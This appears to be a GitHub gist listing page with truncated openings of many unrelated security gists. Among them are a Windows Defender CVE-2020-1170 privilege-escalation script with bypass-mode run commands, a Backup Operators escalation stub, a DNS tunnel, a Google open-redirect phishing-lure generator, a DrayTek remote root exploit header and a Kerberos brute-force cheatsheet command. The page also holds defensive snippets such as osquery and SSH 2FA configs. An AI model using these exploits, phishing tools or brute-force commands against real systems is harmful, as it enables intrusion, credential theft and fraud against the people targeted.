@gwillcox-r7
gwillcox-r7 / DefenderArbitraryFileDelete.ps1
Created July 13, 2020 20:20
Windows Defender CVE-2020-1170 LPE Work Archive
# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
# All credits go to @itm4n for this PowerShell script!
# Testing
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
# Real
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'
$JobCode = {
function DoMpCmdRunLogFileWriteTriggerJob {
@D00MFist
D00MFist / osquery.conf
Last active May 27, 2024 20:03
Osquery Config
{
"options": {
"logger_snapshot_event_type": "true",
"schedule_splay_percent": 10
},
"platform": "darwin",
"schedule": {
"authorized_keys": {
"query": "SELECT * FROM users CROSS JOIN authorized_keys USING (uid);",
//https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/
//https://github.com/decoder-it/BadBackupOperator/blob/master/SuBackup/SuBackup/SuBackup.cpp
//https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function
//https://docs.microsoft.com/en-us/windows/win32/vds/loading-vds
//Replace system command with your code. If DewIt() does not run, check if the vds service is running, it should be on-demand.
#define UNICODE
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
@eladshamir
eladshamir / DnsTunnel.cs
Created April 11, 2020 21:50
This simple program tunnels UDP DNS packets to a TCP port
using System;
using System.Net.Sockets;
using System.Net;
namespace DnsTunnel
{
class Program
{
static void OpenTunnel(int listenerPort, string targetHost, int targetPort)
{
@ustayready
ustayready / google_lure.py
Last active September 23, 2024 20:18
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@0xsha
0xsha / CVE-2020-8515.go
Last active March 30, 2024 20:52
CVE-2020-8515: DrayTek pre-auth remote root RCE
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
@radiantly
radiantly / README.md
Last active November 12, 2021 23:24 — forked from lifehome/README.md
Cloudflare API v4 Dynamic DNS Update in Bash

Cloudflare DDNS bash client with systemd

This is a bash script that acts as a Cloudflare DDNS client, a useful replacement for ddclient.

How to use?

  1. Put the cfupdater files in /usr/local/bin
  2. chmod +x /usr/local/bin/cfupdater
  3. Create a systemd service unit at /etc/systemd/system/; cfupdate.service is shown as an example.
  4. Create a systemd timer unit in the same location as the service unit; cfupdate.timer is shown as an example.
  5. sudo systemctl enable cfupdate.timer
  6. sudo systemctl start cfupdate.timer
@SwitHak
SwitHak / 20190730-TLP-WHITE_URGENT11_VxWorks.MD
Last active June 5, 2020 08:12
Tracking vendors responses to URGENT/11 VxWorks vulnerabilities (Last updated: 2020-02-21 1019 UTC)

Advisory (URGENT/11)

UPDATE (2019-10-02 1241 UTC)

General

Armis released new information about the scope of the vulnerabilities. The vulnerabilities impact more RTOSes than expected.

IP Stacks backstory

  • Some of the vulnerabilities discovered by Armis don't reside in the VxWorks RTOS itself but in one part of it, the IP stack. This IP stack, named IPNET, comes from Interpeak AB, a company acquired by Wind River, the editor of the VxWorks RTOS, on 20 March 2006.
  • Before being acquired by Wind River, Interpeak AB sold IP stacks to several of its customers. Interpeak AB sold 2 major IP stacks, named IPNET and IPLITE; IPLITE is a light version of IPNET.
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With a Rubeus version that includes the brute module:

@lizthegrey
lizthegrey / attributes.rb
Last active March 27, 2025 02:16
Hardening SSH with 2fa
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'